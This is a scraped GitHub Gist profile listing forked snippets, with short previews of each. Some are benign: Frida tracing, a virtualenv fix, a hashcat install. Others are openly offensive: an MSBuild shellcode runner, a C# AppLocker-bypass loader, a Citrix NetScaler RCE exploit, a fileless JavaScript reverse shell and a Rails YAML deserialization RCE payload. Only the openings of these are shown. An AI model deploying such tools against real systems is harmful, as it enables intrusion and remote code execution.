Skip to content

Instantly share code, notes, and snippets.

Avatar

LongCat pich4ya

View GitHub Profile
@pich4ya
pich4ya / flutter_ios.js
Created Jun 18, 2021 — forked from AICDEV/flutter_ios.js
Frida trace Flutter Functions on iOS
View flutter_ios.js
/**
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause
*/
// #############################################
// HELPER SECTION START
var colors = {
"resetColor": "\x1b[0m",
"green": "\x1b[32m",
"yellow": "\x1b[33m",
@pich4ya
pich4ya / fix_virtualenv
Created May 16, 2020 — forked from tevino/fix_virtualenv
Fix python virtualenv after python update
View fix_virtualenv
#!/usr/bin/env bash
ENV_PATH="$(dirname "$(dirname "$(which pip)")")"
SYSTEM_VIRTUALENV="$(which -a virtualenv|tail -1)"
BAD_ENV_PATHS="/usr/local"
echo "Ensure the root of the broken virtualenv:"
echo " $ENV_PATH"
@pich4ya
pich4ya / shellcode.xml
Created May 1, 2020 — forked from ConsciousHacker/shellcode.xml
MSBuild Shellcode Runner
View shellcode.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
@pich4ya
pich4ya / Shellcode.cs
Created May 1, 2020 — forked from netbiosX/Shellcode.cs
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
 
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@pich4ya
pich4ya / netscaler_exploit.py
Created Jan 19, 2020 — forked from 0x09AL/netscaler_exploit.py
Citrix ADC / NetScaler Remote Command Execution
View netscaler_exploit.py
import requests
import sys
import time
append_value = str(time.time())
print "# By 0x09AL - MDSec ActiveBreach \n"
def upload_file(url,payload):
endpoint = url + "/vpns/portal/scripts/newbm.pl"
@pich4ya
pich4ya / ChangePassword.java
Created Feb 24, 2019 — forked from zach-klippenstein/ChangePassword.java
The keystore password on Java keystore files is utterly pointless. You can reset it without knowing it, as shown by this code. Note that private keys are still secure, as far as I know. The JKS implementation is copyright Casey Marshall (rsdio@metastatic.org), and the original source is available at http://metastatic.org/source/JKS.java. I've in…
View ChangePassword.java
import java.util.*;
import java.io.*;
import java.security.*;
public class ChangePassword
{
private final static JKS j = new JKS();
public static void main(String[] args) throws Exception
{
@pich4ya
pich4ya / hashcat_macos.sh
Last active Feb 4, 2022 — forked from chadmayfield/hashcat_macos.sh
Install Hashcat on macOS
View hashcat_macos.sh
#!/bin/bash
git clone https://github.com/hashcat/hashcat.git
mkdir -p hashcat/deps
git clone https://github.com/KhronosGroup/OpenCL-Headers.git hashcat/deps/OpenCL
cd hashcat/ && make && make install
./hashcat --version
./hashcat -b -D 1,2
./example0.sh
@pich4ya
pich4ya / JSRat.ps1
Created Jul 4, 2018 — forked from nbosa/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
View JSRat.ps1
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.
@pich4ya
pich4ya / railspwn.rb
Last active Nov 29, 2018 — forked from niklasb/railspwn.rb
Rails 5.1.4 YAML unsafe deserialization RCE payload, full credit to: https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
View railspwn.rb
# https://gist.github.com/500646/5a0add1a0301492714342ba82b1d3aee
require 'yaml'
require 'base64'
require 'erb'
class ActiveSupport
class Deprecation
def initialize()
@silenced = true
end